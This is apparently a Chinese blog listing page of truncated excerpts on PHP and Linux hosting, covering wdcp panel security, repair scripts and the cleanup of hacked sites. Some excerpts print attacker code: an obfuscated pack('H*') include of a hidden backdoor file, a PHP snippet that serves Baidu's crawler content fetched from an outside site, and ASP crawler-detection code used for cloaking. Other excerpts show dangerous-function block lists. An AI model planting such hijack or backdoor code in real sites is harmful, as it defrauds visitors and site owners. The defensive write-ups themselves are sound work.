Linux/PHP:
2016年12月30日
719 浏览量
停止php代码执行有两个函数是die()和exit();通常与错误管理一起使用(严格说来,它们是语言构造而不是函数,但是谁在意这些呢)。当在脚本中调用 die()和exit()时,将会终止整个脚本。它们都可用于阻止脚本继续执行,而使得某些重要的操作(如建立一条数据库连接)不会发生。你还可以给 die()和exit()传递一个将在浏览器中打印出来的字符串。
2016年12月30日
732 浏览量
登录页面login.html 负责收集用户填写的登录信息。<fieldset>
<legend>用户登录</legend>
<form name="LoginForm" method="post" action="login.php" onSubmit="return InputCheck(this)">
<
2016年12月29日
703 浏览量
(1)wdcp的后台,默认端口,是8080,可以修改为其它端口,可以限制IP地址的访问,也可以限制域名的访问做了这些限制与设置后,已相对安全了,也一般没人知道和能访问你的后台了但有一些情况,就是搜索引擎里,有些把这个后台的地址也给收录了,这样还是把这个后台的地址给爆露了那,有没一个比较绝对的安全限制方法,答案是有的,如下说的就是(2)怎么实现,很简单在后台限制域名里,绑定一个不存在或没做解析的域名,比如admin.wdcp.cn因为这个域名不存在或没解析,所以没有人知道这个域名的存在,除了你自己
2016年12月29日
676 浏览量
强制修改mysql的root密码,在忘记mysql密码时有用sh /www/wdlinux/tools/mysql_root_chg.shftp配置文件检查,在FTP不能连接或登录时有用sh /www/wdlinux/tools/pureftp_conf_check.shwdcp权限检查,在wdcp后台不正常或部分功能无法使用时有用sh /www/wdlinux/tools/wdcp_perm_check.shwdcp数据库无法连接的修复,如登录后台提示”无法连接mysql,请检查mysql是否
2016年12月28日
1317 浏览量
在php脚本中加入 echo 语句逐步缩小范围,最终发现问题由下面一条语句引起INCLUDE(pack('H*','2f7661722f746d702f2e53595344554d502f2e576830416d492e434f5245'));上面的语句引入了 /var/tmp/.SYSDUMP/.Wh0AmI.CORE 脚本。删除该语句后问题解决。搜索 引擎劫持解决。但是另外在uc_client/control/class.php可以找到<?php $mt
2016年12月28日
641 浏览量
linux上php木马、后门查杀总结 经过联系断续一个月的对抗,网站被攻击、挂马、做SEO黑帽的问题终于告一段落,现在总结下经验。Web Server(Nginx为例)1、为防止跨站感染,要做虚拟主机目录隔离(我是直接利用fpm建立多个程序池达到隔离效果)2、上传目录、include类的库文件目录要禁止代码执行(Nginx正则过滤)3、path_info漏洞修正:if ($request_filename ~* (.*)\.php) {set $php_url $1;}if
2016年12月28日
612 浏览量
在配置前需要确认你的空间是否支持.htaccess和rewrite,该方法基于.htaccess文件中使用rewrite来达到禁止指定脚本的运行效果。RewriteEngine on RewriteCond % !^$
RewriteRule uploads/(.*).(php)$ – [F]
RewriteRule data/(.*).(php)$ – [F]
RewriteR
2016年12月28日
720 浏览量
PHP配置禁用危险函数:eval,proc_terminate禁用危险函数:phpinfo,passthru,exec,system,chroot,chgrp,chown,shell_exec,proc_open,proc_get_status,ini_alter,ini_alter禁用危险函数:ini_restore,dl,pfsockopen,openlog,syslog,readlink,symlink,popepassthru,stream_socket_server,fsocke禁用危
2016年12月27日
698 浏览量
什么是百度快照劫持?就是百度搜索你的网站的时候,域名是你的,标题和快照内容全部被替换成了其他。但是直接打开网站查找源代码里却没有变化。//判断是否为百度蜘蛛,然后进行内容劫持
if(stripos($_SERVER ["HTTP_USER_AGENT"],"baidu")>-1){
$html=file_get_contents('http://www.xxx.com/');
&nb
2016年12月27日
601 浏览量
<%
function Getbot()
dim s_agent
GetBot=""
s_agent=Request.ServerVariables("HTTP_USER_AGENT")
if instr(1,s_agent,"googlebot",1) > 0 then
GetBot="google"
end if
i